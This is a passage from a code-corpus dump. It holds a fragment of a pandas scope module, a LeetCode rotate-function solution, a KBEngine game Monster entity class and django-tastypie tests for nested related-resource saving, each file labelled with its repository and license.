Returns
-------
name : basestring
The name of the temporary variable created.
"""
name = '{name}_{num}_{hex_id}'.format(name=type(value).__name__,
num=self.ntemps,
hex_id=_raw_hex_id(self))
# add to inner most scope
assert name not in self.temps
self.temps[name] = value
assert name in self.temps
# only increment if the variable gets put in the scope
return name
@property
def ntemps(self):
"""The number of temporary variables in this scope"""
return len(self.temps)
@property
def full_scope(self):
"""Return the full scope for use with passing to engines transparently
as a mapping.
Returns
-------
vars : DeepChainMap
All variables in this scope.
"""
maps = [self.temps] + self.resolvers.maps + self.scope.maps
return DeepChainMap(*maps)
|
MJuddBooth/pandas
|
pandas/core/computation/scope.py
|
Python
|
bsd-3-clause
| 9,212
|
"""Fun games to play! """
|
Ikusaba-san/Chiaki-Nanami
|
cogs/games/__init__.py
|
Python
|
mit
| 26
|
class Solution(object):
def maxRotateFunction(self, A):
"""
:type A: List[int]
:rtype: int
"""
res = 0
prevDiff = 0
s = sum(A)
for i in xrange(len(A) - 1):
diff = s - len(A) * A[len(A) - 1 - i]
res = max(res, diff + prevDiff)
prevDiff += diff
return res + sum([i * A[i] for i in xrange(len(A))]) if A else 0
|
Jacy-Wang/MyLeetCode
|
RotateFunction396.py
|
Python
|
gpl-2.0
| 420
|
# -*- coding: utf-8 -*-
import random
import math
import time
import KBEngine
import wtimer
from KBEDebug import *
from interfaces.Combat import Combat
from interfaces.Spell import Spell
from interfaces.Motion import Motion
from interfaces.State import State
from interfaces.Flags import Flags
from interfaces.AI import AI
from interfaces.NPCObject import NPCObject
class Monster(KBEngine.Entity,
NPCObject,
Flags,
State,
Motion,
Combat,
Spell,
AI):
def __init__(self):
KBEngine.Entity.__init__(self)
NPCObject.__init__(self)
Flags.__init__(self)
State.__init__(self)
Motion.__init__(self)
Combat.__init__(self)
Spell.__init__(self)
AI.__init__(self)
if self.modelID == 20002001:
self.layer = 1 # entity所在的层,可以设置多个不同的navmesh层来寻路
def initEntity(self):
"""
virtual method.
"""
pass
def checkInTerritory(self):
"""
virtual method.
检查自己是否在可活动领地中
"""
return AI.checkInTerritory(self)
def isMonster(self):
"""
virtual method.
"""
return True
# ----------------------------------------------------------------
# callback
# ----------------------------------------------------------------
def onWitnessed(self, isWitnessed):
"""
KBEngine method.
此实体是否被观察者(player)观察到, 此接口主要是提供给服务器做一些性能方面的优化工作,
在通常情况下,一些entity不被任何客户端所观察到的时候, 他们不需要做任何工作, 利用此接口
可以在适当的时候激活或者停止这个entity的任意行为。
@param isWitnessed : 为false时, entity脱离了任何观察者的观察
"""
AI.onWitnessed(self, isWitnessed)
def onForbidChanged_(self, forbid, isInc):
"""
virtual method.
entity禁止 条件改变
@param isInc : 是否是增加
"""
State.onForbidChanged_(self, forbid, isInc)
AI.onForbidChanged_(self, forbid, isInc)
def onStateChanged_(self, oldstate, newstate):
"""
virtual method.
entity状态改变了
"""
State.onStateChanged_(self, oldstate, newstate)
AI.onStateChanged_(self, oldstate, newstate)
NPCObject.onStateChanged_(self, oldstate, newstate)
def onSubStateChanged_(self, oldSubState, newSubState):
"""
virtual method.
子状态改变了
"""
State.onSubStateChanged_(self, oldSubState, newSubState)
AI.onSubStateChanged_(self, oldSubState, newSubState)
def onFlagsChanged_(self, flags, isInc):
"""
virtual method.
"""
Flags.onFlagsChanged_(self, flags, isInc)
AI.onFlagsChanged_(self, flags, isInc)
def onEnterTrap(self, entity, range_xz, range_y, controllerID, userarg):
"""
KBEngine method.
引擎回调进入陷阱触发
"""
AI.onEnterTrap(self, entity, range_xz, range_y, controllerID, userarg)
def onLeaveTrap(self, entity, range_xz, range_y, controllerID, userarg):
"""
KBEngine method.
引擎回调离开陷阱触发
"""
AI.onLeaveTrap(self, entity, range_xz, range_y, controllerID, userarg)
def onAddEnemy(self, entityID):
"""
virtual method.
有敌人进入列表
"""
AI.onAddEnemy(self, entityID)
Combat.onAddEnemy(self, entityID)
def onRemoveEnemy(self, entityID):
"""
virtual method.
删除敌人
"""
AI.onRemoveEnemy(self, entityID)
Combat.onRemoveEnemy(self, entityID)
def onDestroy(self):
"""
entity销毁
"""
NPCObject.onDestroy(self)
Combat.onDestroy(self)
Monster._timermap = {}
Monster._timermap.update(NPCObject._timermap)
Monster._timermap.update(Flags._timermap)
Monster._timermap.update(State._timermap)
Monster._timermap.update(Motion._timermap)
Monster._timermap.update(Combat._timermap)
Monster._timermap.update(Spell._timermap)
Monster._timermap.update(AI._timermap)
|
LaoZhongGu/kbengine
|
demo/res/scripts/cell/Monster.py
|
Python
|
lgpl-3.0
| 3,929
|
from datetime import datetime
import json
import django
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.db.models.signals import pre_save
from django.test.testcases import TestCase
from tastypie import fields
from tastypie.exceptions import ApiFieldError, NotFound
from core.models import Note, MediaBit
from core.tests.mocks import MockRequest
from related_resource.api.resources import CategoryResource, ForumResource,\
FreshNoteResource, JobResource, NoteResource, OrderResource,\
NoteWithUpdatableUserResource, PersonResource, TagResource, UserResource
from related_resource.api.urls import api
from related_resource.models import Category, Label, Tag, Taggable,\
TaggableTag, ExtraData, Company, Person, Dog, DogHouse, Bone, Product,\
Address, Job, Payment, Forum, Order, OrderItem, Contact, ContactGroup
from testcases import TestCaseWithFixture
class M2MResourcesTestCase(TestCaseWithFixture):
def test_same_object_added(self):
"""
From Issue #1035
"""
user = User.objects.create(username='gjcourt')
ur = UserResource()
fr = ForumResource()
resp = self.client.post(fr.get_resource_uri(), content_type='application/json', data=json.dumps({
'name': 'Test Forum',
'members': [ur.get_resource_uri(user)],
'moderators': [ur.get_resource_uri(user)],
}))
self.assertEqual(resp.status_code, 201, resp.content)
data = json.loads(resp.content.decode('utf-8'))
self.assertEqual(len(data['moderators']), 1)
self.assertEqual(len(data['members']), 1)
class RelatedResourceTest(TestCaseWithFixture):
urls = 'related_resource.api.urls'
def setUp(self):
super(RelatedResourceTest, self).setUp()
self.user = User.objects.create(username="testy_mctesterson")
def test_cannot_access_user_resource(self):
resource = api.canonical_resource_for('users')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PUT'
request.set_body('{"username": "foobar"}')
resp = resource.wrap_view('dispatch_detail')(request, pk=self.user.pk)
self.assertEqual(resp.status_code, 405)
self.assertEqual(User.objects.get(id=self.user.id).username, self.user.username)
def test_related_resource_authorization(self):
resource = api.canonical_resource_for('notes')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.set_body('{"content": "The cat is back. The dog coughed him up out back.", "created": "2010-04-03 20:05:00", "is_active": true, "slug": "cat-is-back", "title": "The Cat Is Back", "updated": "2010-04-03 20:05:00", "author": null}')
resp = resource.post_list(request)
self.assertEqual(resp.status_code, 201)
self.assertEqual(User.objects.get(id=self.user.id).username, 'testy_mctesterson')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.set_body('{"content": "The cat is back. The dog coughed him up out back.", "created": "2010-04-03 20:05:00", "is_active": true, "slug": "cat-is-back-2", "title": "The Cat Is Back", "updated": "2010-04-03 20:05:00", "author": {"id": %s, "username": "foobar"}}' % self.user.id)
resp = resource.post_list(request)
self.assertEqual(resp.status_code, 201)
self.assertEqual(User.objects.get(id=self.user.id).username, 'foobar')
def test_ok_not_null_field_included(self):
"""
Posting a new detail with no related objects
should require one query to save the object
"""
company = Company.objects.create()
resource = api.canonical_resource_for('product')
request = MockRequest()
body = json.dumps({
'producer': {'pk': company.pk},
})
request.set_body(body)
resp = resource.post_list(request)
self.assertEqual(resp.status_code, 201)
def test_apifielderror_missing_not_null_field(self):
"""
Posting a new detail with no related objects
should require one query to save the object
"""
resource = api.canonical_resource_for('product')
request = MockRequest()
body = json.dumps({})
request.set_body(body)
with self.assertRaises(ApiFieldError):
resource.post_list(request)
class CategoryResourceTest(TestCaseWithFixture):
urls = 'related_resource.api.urls'
def setUp(self):
super(CategoryResourceTest, self).setUp()
self.parent_cat_1 = Category.objects.create(parent=None, name='Dad')
self.parent_cat_2 = Category.objects.create(parent=None, name='Mom')
self.child_cat_1 = Category.objects.create(parent=self.parent_cat_1, name='Son')
self.child_cat_2 = Category.objects.create(parent=self.parent_cat_2, name='Daughter')
def test_correct_relation(self):
resource = api.canonical_resource_for('category')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'GET'
resp = resource.wrap_view('dispatch_detail')(request, pk=self.parent_cat_1.pk)
self.assertEqual(resp.status_code, 200)
data = json.loads(resp.content.decode('utf-8'))
self.assertEqual(data['parent'], None)
self.assertEqual(data['name'], 'Dad')
# Now try a child.
resp = resource.wrap_view('dispatch_detail')(request, pk=self.child_cat_2.pk)
self.assertEqual(resp.status_code, 200)
data = json.loads(resp.content.decode('utf-8'))
self.assertEqual(data['parent'], '/v1/category/2/')
self.assertEqual(data['name'], 'Daughter')
def test_put_null(self):
resource = api.canonical_resource_for('category')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PUT'
request.set_body('{"parent": null, "name": "Son"}')
# Before the PUT, there should be a parent.
self.assertEqual(Category.objects.get(pk=self.child_cat_1.pk).parent.pk, self.parent_cat_1.pk)
# After the PUT, the parent should be ``None``.
resp = resource.put_detail(request, pk=self.child_cat_1.pk)
self.assertEqual(resp.status_code, 204)
self.assertEqual(Category.objects.get(pk=self.child_cat_1.pk).name, 'Son')
self.assertEqual(Category.objects.get(pk=self.child_cat_1.pk).parent, None)
class ExplicitM2MResourceRegressionTest(TestCaseWithFixture):
urls = 'related_resource.api.urls'
def setUp(self):
super(ExplicitM2MResourceRegressionTest, self).setUp()
self.tag_1 = Tag.objects.create(name='important')
self.taggable_1 = Taggable.objects.create(name='exam')
# Create relations between tags and taggables through the explicit m2m table
self.taggabletag_1 = TaggableTag.objects.create(tag=self.tag_1, taggable=self.taggable_1)
# Give each tag some extra data (the lookup of this data is what makes the test fail)
self.extradata_1 = ExtraData.objects.create(tag=self.tag_1, name='additional')
def test_correct_setup(self):
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'GET'
# Verify the explicit 'through' relationships has been created correctly
resource = api.canonical_resource_for('taggabletag')
resp = resource.wrap_view('dispatch_detail')(request, pk=self.taggabletag_1.pk)
data = json.loads(resp.content.decode('utf-8'))
self.assertEqual(resp.status_code, 200)
self.assertEqual(data['tag'], '/v1/tag/1/')
self.assertEqual(data['taggable'], '/v1/taggable/1/')
resource = api.canonical_resource_for('taggable')
resp = resource.wrap_view('dispatch_detail')(request, pk=self.taggable_1.pk)
data = json.loads(resp.content.decode('utf-8'))
self.assertEqual(resp.status_code, 200)
self.assertEqual(data['name'], 'exam')
resource = api.canonical_resource_for('tag')
request.path = "/v1/tag/%(pk)s/" % {'pk': self.tag_1.pk}
resp = resource.wrap_view('dispatch_detail')(request, pk=self.tag_1.pk)
data = json.loads(resp.content.decode('utf-8'))
self.assertEqual(resp.status_code, 200)
self.assertEqual(data['name'], 'important')
# and check whether the extradata is present
self.assertEqual(data['extradata']['name'], u'additional')
def test_post_new_tag(self):
resource = api.canonical_resource_for('tag')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.set_body('{"name": "school", "taggabletags": [ ]}')
# Prior to the addition of ``blank=True``, this would
# fail badly.
resp = resource.wrap_view('dispatch_list')(request)
self.assertEqual(resp.status_code, 201)
# GET the created object (through its headers.location)
self.assertTrue(resp.has_header('location'))
location = resp['Location']
resp = self.client.get(location, data={'format': 'json'})
self.assertEqual(resp.status_code, 200)
deserialized = json.loads(resp.content.decode('utf-8'))
self.assertEqual(len(deserialized), 5)
self.assertEqual(deserialized['name'], 'school')
class OneToManySetupTestCase(TestCaseWithFixture):
urls = 'related_resource.api.urls'
def test_one_to_many(self):
# Sanity checks.
self.assertEqual(Note.objects.count(), 2)
self.assertEqual(MediaBit.objects.count(), 0)
fnr = FreshNoteResource()
data = {
'title': 'Create with related URIs',
'slug': 'create-with-related-uris',
'content': 'Some content here',
'is_active': True,
'media_bits': [
{
'title': 'Picture #1'
}
]
}
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.set_body(json.dumps(data))
resp = fnr.post_list(request)
self.assertEqual(resp.status_code, 201)
self.assertEqual(Note.objects.count(), 3)
note = Note.objects.latest('created')
self.assertEqual(note.media_bits.count(), 1)
self.assertEqual(note.media_bits.all()[0].title, u'Picture #1')
class FullCategoryResource(CategoryResource):
parent = fields.ToOneField('self', 'parent', null=True, full=True)
class RelationshipOppositeFromModelTestCase(TestCaseWithFixture):
"""
On the model, the Job relationship is defined on the Payment.
On the resource, the PaymentResource is defined on the JobResource as well
"""
def setUp(self):
super(RelationshipOppositeFromModelTestCase, self).setUp()
# a job with a payment exists to start with
self.some_time_str = datetime.now().strftime('%Y-%m-%d %H:%M')
job = Job.objects.create(name='SomeJob')
Payment.objects.create(job=job, scheduled=self.some_time_str)
def test_create_similar(self):
# We submit to job with the related payment included.
# Note that on the resource, the payment related resource is defined
# On the model, the Job class does not have a payment field,
# but it has a reverse relationship defined by the Payment class
resource = JobResource()
data = {
'name': 'OtherJob',
'payment': {
'scheduled': self.some_time_str
}
}
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.set_body(json.dumps(data))
resp = resource.post_list(request)
self.assertEqual(resp.status_code, 201)
self.assertEqual(Job.objects.count(), 2)
self.assertEqual(Payment.objects.count(), 2)
new_job = Job.objects.all().order_by('-id')[0]
new_payment = Payment.objects.all().order_by('-id')[0]
self.assertEqual(new_job.name, 'OtherJob')
self.assertEqual(new_job, new_payment.job)
class RelatedPatchTestCase(TestCaseWithFixture):
urls = 'related_resource.api.urls'
def test_patch_to_one(self):
resource = FullCategoryResource()
cat1 = Category.objects.create(name='Dad')
cat2 = Category.objects.create(parent=cat1, name='Child')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PATCH'
request.path = "/v1/category/%(pk)s/" % {'pk': cat2.pk}
data = {
'name': 'Kid'
}
request.set_body(json.dumps(data))
self.assertEqual(cat2.name, 'Child')
resp = resource.patch_detail(request, pk=cat2.pk)
self.assertEqual(resp.status_code, 202)
cat2 = Category.objects.get(pk=2)
self.assertEqual(cat2.name, 'Kid')
def test_patch_detail_with_missing_related_fields(self):
"""
When fields are excluded the value of the field should not be set to a
default value if updated by tastypie.
"""
resource = NoteWithUpdatableUserResource()
note = Note.objects.create(author_id=1)
user = User.objects.get(pk=1)
self.assertEqual(user.password, 'this_is_not_a_valid_password_string')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PATCH'
request.path = "/v1/noteswithupdatableuser/%(pk)s/" % {'pk': note.pk}
data = {
'author': {
'id': 1,
'username': 'johndoe',
'email': 'john@doetown.com',
}
}
request.set_body(json.dumps(data))
resp = resource.patch_detail(request, pk=note.pk)
self.assertEqual(resp.status_code, 202)
user2 = User.objects.get(pk=1)
self.assertEqual(user2.email, 'john@doetown.com')
self.assertEqual(user2.password, 'this_is_not_a_valid_password_string')
def test_patch_detail_dont_update_related_without_permission(self):
"""
When fields are excluded the value of the field should not be set to a
default value if updated by tastypie.
"""
resource = NoteResource()
note = Note.objects.create(author_id=1)
user = User.objects.get(pk=1)
self.assertEqual(user.password, 'this_is_not_a_valid_password_string')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PATCH'
request.path = "/v1/note/%(pk)s/" % {'pk': note.pk}
data = {
'author': {
'id': 1,
'username': 'johndoe',
'email': 'john@doetown.com',
}
}
request.set_body(json.dumps(data))
resp = resource.patch_detail(request, pk=note.pk)
self.assertEqual(resp.status_code, 202)
user2 = User.objects.get(pk=1)
self.assertEqual(user2.email, 'john@doetown.com')
self.assertEqual(user2.password, 'this_is_not_a_valid_password_string')
class NestedRelatedResourceTest(TestCaseWithFixture):
urls = 'related_resource.api.urls'
def test_one_to_one(self):
"""
Test a related ToOne resource with a nested full ToOne resource
"""
self.assertEqual(Person.objects.count(), 0)
self.assertEqual(Company.objects.count(), 0)
self.assertEqual(Address.objects.count(), 0)
pr = PersonResource()
data = {
'name': 'Joan Rivers',
'company': {
'name': 'Yum Yum Pie Factory!',
'address': {
'line': 'Somewhere, Utah'
}
}
}
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.set_body(json.dumps(data))
resp = pr.post_list(request)
self.assertEqual(resp.status_code, 201)
pk = Person.objects.all()[0].pk
request = MockRequest()
request.method = 'GET'
request.path = reverse('api_dispatch_detail', kwargs={
'pk': pk,
'resource_name': pr._meta.resource_name,
'api_name': pr._meta.api_name
})
resp = pr.get_detail(request, pk=pk)
self.assertEqual(resp.status_code, 200)
person = json.loads(resp.content.decode('utf-8'))
self.assertEqual(person['name'], 'Joan Rivers')
company = person['company']
self.assertEqual(company['name'], 'Yum Yum Pie Factory!')
address = company['address']
self.assertEqual(address['line'], 'Somewhere, Utah')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PUT'
request.path = reverse('api_dispatch_detail', kwargs={
'pk': pk,
'resource_name': pr._meta.resource_name,
'api_name': pr._meta.api_name
})
request.set_body(resp.content.decode('utf-8'))
resp = pr.put_detail(request, pk=pk)
self.assertEqual(resp.status_code, 204)
def test_one_to_many(self):
"""
Test a related ToOne resource with a nested full ToMany resource
"""
self.assertEqual(Person.objects.count(), 0)
self.assertEqual(Company.objects.count(), 0)
self.assertEqual(Product.objects.count(), 0)
pr = PersonResource()
data = {
'name': 'Joan Rivers',
'company': {
'name': 'Yum Yum Pie Factory!',
'products': [
{
'name': 'Tasty Pie'
}
]
}
}
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.set_body(json.dumps(data))
resp = pr.post_list(request)
self.assertEqual(resp.status_code, 201)
self.assertEqual(Person.objects.count(), 1)
self.assertEqual(Company.objects.count(), 1)
self.assertEqual(Product.objects.count(), 1)
pk = Person.objects.all()[0].pk
request = MockRequest()
request.method = 'GET'
resp = pr.get_detail(request, pk=pk)
self.assertEqual(resp.status_code, 200)
person = json.loads(resp.content.decode('utf-8'))
self.assertEqual(person['name'], 'Joan Rivers')
company = person['company']
self.assertEqual(company['name'], 'Yum Yum Pie Factory!')
self.assertEqual(len(company['products']), 1)
product = company['products'][0]
self.assertEqual(product['name'], 'Tasty Pie')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PUT'
request.set_body(json.dumps(person))
resp = pr.put_detail(request, pk=pk)
self.assertEqual(resp.status_code, 204)
def test_many_to_one(self):
"""
Test a related ToMany resource with a nested full ToOne resource
"""
self.assertEqual(Person.objects.count(), 0)
self.assertEqual(Dog.objects.count(), 0)
self.assertEqual(DogHouse.objects.count(), 0)
pr = PersonResource()
data = {
'name': 'Joan Rivers',
'dogs': [
{
'name': 'Snoopy',
'house': {
'color': 'Red'
}
}
]
}
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.set_body(json.dumps(data))
resp = pr.post_list(request)
self.assertEqual(resp.status_code, 201)
self.assertEqual(Person.objects.count(), 1)
self.assertEqual(Dog.objects.count(), 1)
self.assertEqual(DogHouse.objects.count(), 1)
pk = Person.objects.all()[0].pk
request = MockRequest()
request.method = 'GET'
request.path = reverse('api_dispatch_detail', kwargs={'pk': pk, 'resource_name': pr._meta.resource_name, 'api_name': pr._meta.api_name})
resp = pr.get_detail(request, pk=pk)
self.assertEqual(resp.status_code, 200)
person = json.loads(resp.content.decode('utf-8'))
self.assertEqual(person['name'], 'Joan Rivers')
self.assertEqual(len(person['dogs']), 1)
dog = person['dogs'][0]
self.assertEqual(dog['name'], 'Snoopy')
house = dog['house']
self.assertEqual(house['color'], 'Red')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PUT'
request.set_body(json.dumps(person))
request.path = reverse('api_dispatch_detail', kwargs={'pk': pk, 'resource_name': pr._meta.resource_name, 'api_name': pr._meta.api_name})
resp = pr.put_detail(request, pk=pk)
self.assertEqual(resp.status_code, 204)
def test_many_to_one_extra_data_ignored(self):
"""
Test a related ToMany resource with a nested full ToOne resource
FieldError would result when extra data is included on an embedded
resource for an already saved object.
"""
self.assertEqual(Person.objects.count(), 0)
self.assertEqual(Dog.objects.count(), 0)
self.assertEqual(DogHouse.objects.count(), 0)
pr = PersonResource()
data = {
'name': 'Joan Rivers',
'dogs': [
{
'name': 'Snoopy',
'house': {
'color': 'Red'
}
}
]
}
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.set_body(json.dumps(data))
resp = pr.post_list(request)
self.assertEqual(resp.status_code, 201)
self.assertEqual(Person.objects.count(), 1)
self.assertEqual(Dog.objects.count(), 1)
self.assertEqual(DogHouse.objects.count(), 1)
pk = Person.objects.all()[0].pk
request = MockRequest()
request.method = 'GET'
request.path = reverse('api_dispatch_detail', kwargs={'pk': pk, 'resource_name': pr._meta.resource_name, 'api_name': pr._meta.api_name})
resp = pr.get_detail(request, pk=pk)
self.assertEqual(resp.status_code, 200)
person = json.loads(resp.content.decode('utf-8'))
self.assertEqual(person['name'], 'Joan Rivers')
self.assertEqual(len(person['dogs']), 1)
dog = person['dogs'][0]
self.assertEqual(dog['name'], 'Snoopy')
house = dog['house']
self.assertEqual(house['color'], 'Red')
# clients may include extra data, which should be ignored. Make extra data is ignored on the resource and sub resources.
person['thisfieldshouldbeignored'] = 'foobar'
person['dogs'][0]['thisfieldshouldbeignored'] = 'foobar'
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PUT'
request.set_body(json.dumps(person))
request.path = reverse('api_dispatch_detail', kwargs={'pk': pk, 'resource_name': pr._meta.resource_name, 'api_name': pr._meta.api_name})
resp = pr.put_detail(request, pk=pk)
self.assertEqual(resp.status_code, 204)
def test_many_to_many(self):
"""
Test a related ToMany resource with a nested full ToMany resource
"""
self.assertEqual(Person.objects.count(), 0)
self.assertEqual(Dog.objects.count(), 0)
self.assertEqual(Bone.objects.count(), 0)
pr = PersonResource()
data = {
'name': 'Joan Rivers',
'dogs': [
{
'name': 'Snoopy',
'bones': [
{
'color': 'white'
}
]
}
]
}
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.path = reverse('api_dispatch_list', kwargs={'resource_name': pr._meta.resource_name, 'api_name': pr._meta.api_name})
request.set_body(json.dumps(data))
resp = pr.post_list(request)
self.assertEqual(resp.status_code, 201)
self.assertEqual(Person.objects.count(), 1)
self.assertEqual(Dog.objects.count(), 1)
self.assertEqual(Bone.objects.count(), 1)
pk = Person.objects.all()[0].pk
request = MockRequest()
request.method = 'GET'
request.path = reverse('api_dispatch_detail', kwargs={'pk': pk, 'resource_name': pr._meta.resource_name, 'api_name': pr._meta.api_name})
resp = pr.get_detail(request, pk=pk)
self.assertEqual(resp.status_code, 200)
person = json.loads(resp.content.decode('utf-8'))
self.assertEqual(person['name'], 'Joan Rivers')
self.assertEqual(len(person['dogs']), 1)
dog = person['dogs'][0]
self.assertEqual(dog['name'], 'Snoopy')
self.assertEqual(len(dog['bones']), 1)
bone = dog['bones'][0]
self.assertEqual(bone['color'], 'white')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PUT'
request.set_body(json.dumps(person))
request.path = reverse('api_dispatch_detail', kwargs={'pk': pk, 'resource_name': pr._meta.resource_name, 'api_name': pr._meta.api_name})
resp = pr.put_detail(request, pk=pk)
self.assertEqual(resp.status_code, 204)
def test_many_to_many_change_nested(self):
"""
Test a related ToMany resource with a nested full ToMany resource
"""
self.assertEqual(Person.objects.count(), 0)
self.assertEqual(Dog.objects.count(), 0)
self.assertEqual(Bone.objects.count(), 0)
pr = PersonResource()
person = Person.objects.create(name='Joan Rivers')
dog = person.dogs.create(name='Snoopy')
bone = dog.bones.create(color='white')
pk = person.pk
request = MockRequest()
request.method = 'GET'
request.path = reverse('api_dispatch_detail', kwargs={'pk': pk, 'resource_name': pr._meta.resource_name, 'api_name': pr._meta.api_name})
resp = pr.get_detail(request, pk=pk)
self.assertEqual(resp.status_code, 200)
data = json.loads(resp.content.decode('utf-8'))
self.assertEqual(data['dogs'][0]['bones'][0]['color'], 'white')
# Change just a nested resource via PUT
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PUT'
data['dogs'][0]['bones'][0]['color'] = 'gray'
body = json.dumps(data)
request.set_body(body)
request.path = reverse('api_dispatch_detail', kwargs={'pk': pk, 'resource_name': pr._meta.resource_name, 'api_name': pr._meta.api_name})
resp = pr.put_detail(request, pk=pk)
self.assertEqual(resp.status_code, 204)
self.assertEqual(Bone.objects.count(), 1)
bone = Bone.objects.all()[0]
self.assertEqual(bone.color, 'gray')
class RelatedSaveCallsTest(TestCaseWithFixture):
urls = 'related_resource.api.urls'
def test_one_query_for_post_list(self):
"""
Posting a new detail with no related objects
should require one query to save the object
"""
resource = api.canonical_resource_for('category')
request = MockRequest()
body = json.dumps({
'name': 'Foo',
'parent': None
})
request.set_body(body)
with self.assertNumQueries(1):
resource.post_list(request)
def test_two_queries_for_post_list(self):
"""
Posting a new detail with one related object, referenced via its
``resource_uri`` should require two queries: one to save the
object, and one to lookup the related object.
"""
parent = Category.objects.create(name='Bar')
resource = api.canonical_resource_for('category')
request = MockRequest()
body = json.dumps({
'name': 'Foo',
'parent': resource.get_resource_uri(parent)
})
request.set_body(body)
with self.assertNumQueries(2):
resource.post_list(request)
def test_no_save_m2m_unchanged(self):
"""
Posting a new detail with a related m2m object shouldn't
save the m2m object unless the m2m object is provided inline.
"""
def _save_fails_test(sender, **kwargs):
self.fail("Should not have saved Label")
pre_save.connect(_save_fails_test, sender=Label)
l1 = Label.objects.get(name='coffee')
resource = api.canonical_resource_for('post')
label_resource = api.canonical_resource_for('label')
request = MockRequest()
body = json.dumps({
'name': 'test post',
'label': [label_resource.get_resource_uri(l1)],
})
request.set_body(body)
resource.post_list(request) # _save_fails_test will explode if Label is saved
def test_save_m2m_changed(self):
"""
Posting a new or updated detail object with a related m2m object
should save the m2m object if it's included inline.
"""
resource = api.canonical_resource_for('tag')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
body_dict = {
'name': 'school',
'taggabletags': [{'extra': 7}]
}
request.set_body(json.dumps(body_dict))
with self.assertNumQueries(4):
resp = resource.wrap_view('dispatch_list')(request)
self.assertEqual(resp.status_code, 201)
# 'extra' should have been set
tag = Tag.objects.all()[0]
taggable_tag = tag.taggabletags.all()[0]
self.assertEqual(taggable_tag.extra, 7)
body_dict['taggabletags'] = [{'extra': 1234}]
request.set_body(json.dumps(body_dict))
request.path = reverse('api_dispatch_detail', kwargs={
'pk': tag.pk,
'resource_name': resource._meta.resource_name,
'api_name': resource._meta.api_name
})
with self.assertNumQueries(5):
resource.put_detail(request)
# 'extra' should have changed
tag = Tag.objects.all()[0]
taggable_tag = tag.taggabletags.all()[0]
self.assertEqual(taggable_tag.extra, 1234)
def test_no_save_m2m_unchanged_existing_data_persists(self):
"""
Data should persist when posting an updated detail object with
unchanged reverse related objects.
"""
person = Person.objects.create(name='Ryan')
dog = Dog.objects.create(name='Wilfred', owner=person)
bone1 = Bone.objects.create(color='White', dog=dog)
bone2 = Bone.objects.create(color='Grey', dog=dog)
self.assertEqual(dog.bones.count(), 2)
resource = api.canonical_resource_for('dog')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PUT'
request._load_post_and_files = lambda *args, **kwargs: None
body_dict = {
'id': dog.id,
'name': 'Wilfred',
'bones': [
{'id': bone1.id, 'color': bone1.color},
{'id': bone2.id, 'color': bone2.color}
]
}
request.set_body(json.dumps(body_dict))
with self.assertNumQueries(13 if django.VERSION >= (1, 9) else 14):
resp = resource.wrap_view('dispatch_detail')(request, pk=dog.pk)
self.assertEqual(resp.status_code, 204)
dog = Dog.objects.all()[0]
dog_bones = dog.bones.all()
self.assertEqual(len(dog_bones), 2)
self.assertEqual(dog_bones[0], bone1)
self.assertEqual(dog_bones[1], bone2)
def test_no_save_m2m_related(self):
"""
When saving an object with a M2M field, don't save that related object's related objects.
"""
cg1 = ContactGroup.objects.create(name='The Inebriati')
cg2 = ContactGroup.objects.create(name='The Stone Cutters')
c1 = Contact.objects.create(name='foo')
c2 = Contact.objects.create(name='bar')
c2.groups.add(cg1, cg2)
c3 = Contact.objects.create(name='baz')
c3.groups.add(cg1)
self.assertEqual(list(c1.groups.all()), [])
self.assertEqual(list(c2.groups.all()), [cg1, cg2])
self.assertEqual(list(c3.groups.all()), [cg1])
data = {
'name': c1.name,
'groups': [reverse('api_dispatch_detail', kwargs={'api_name': 'v1', 'resource_name': 'contactgroup', 'pk': cg1.pk})],
}
resource = api.canonical_resource_for('contact')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PUT'
request._load_post_and_files = lambda *args, **kwargs: None
request.set_body(json.dumps(data))
with self.assertNumQueries(8):
response = resource.wrap_view('dispatch_detail')(request, pk=c1.pk)
self.assertEqual(response.status_code, 204, response.content)
new_contacts = Contact.objects.all()
new_c1 = new_contacts[0]
new_c2 = new_contacts[1]
new_c3 = new_contacts[2]
self.assertEqual(new_c1.name, c1.name)
self.assertEqual(new_c1.id, c1.id)
self.assertEqual(list(new_c1.groups.all()), [cg1])
self.assertEqual(new_c2.id, c2.id)
self.assertEqual(list(new_c2.groups.all()), [cg1, cg2])
self.assertEqual(new_c3.id, c3.id)
self.assertEqual(list(new_c3.groups.all()), [cg1])
new_cg1 = ContactGroup.objects.get(id=cg1.id)
new_cg2 = ContactGroup.objects.get(id=cg2.id)
self.assertEqual(list(new_cg1.members.all()), [new_c1, new_c2, new_c3])
self.assertEqual(list(new_cg2.members.all()), [new_c2])
class CorrectUriRelationsTestCase(TestCaseWithFixture):
"""
Validate that incorrect URI (with PKs that line up to valid data) are not
accepted.
"""
urls = 'related_resource.api.urls'
def test_incorrect_uri(self):
self.assertEqual(Note.objects.count(), 2)
nr = NoteResource()
# For this test, we need a ``User`` with the same PK as a ``Note``.
note_1 = Note.objects.latest('created')
User.objects.create(
id=note_1.pk,
username='valid',
